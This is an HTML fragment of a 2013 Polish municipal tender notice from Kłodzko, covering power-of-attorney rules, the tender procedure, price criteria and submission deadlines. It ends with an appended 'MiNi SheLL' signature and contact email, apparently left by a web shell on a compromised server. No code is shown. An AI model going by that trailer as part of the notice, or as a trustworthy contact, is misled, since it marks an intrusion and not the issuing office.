B.2.9. Jeżeli Wykonawcę reprezentuje pełnomocnik, a nie wynika to bezpośrednio                z dokumentów załączonych do oferty, to do oferty musi być załączone pełnomocnictwo. 
Wszystkie kserokopie dokumentów muszą być poświadczone za zgodność z oryginałem przez pełnomocnika, z zastrzeżeniem zapisów punktu B.2.4. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem. Wszelkie pełnomocnictwa uprawniające do reprezentacji winny być złożone w formie oryginału i podpisane przez osoby uprawnione do reprezentacji Wykonawcy. W przypadku złożenia kserokopii, pełnomocnictwo musi być potwierdzone notarialnie. Treść pełnomocnictwa powinna zawierać jego zakres oraz określać do jakiego zamówienia publicznego zostało ono złożone.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.klodzko.pl/gospodaraka/zamowienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Kłodzku ; pl. B. Chrobrego 1;   57-300 Kłodzko, pok. 101 - Biuro Obsługi Ludności..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2013 godzina 10:00, miejsce: Urząd Miasta w Kłodzku ; pl. B. Chrobrego 1;   57-300 Kłodzko, pok. 101 - Biuro Obsługi Ludności..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com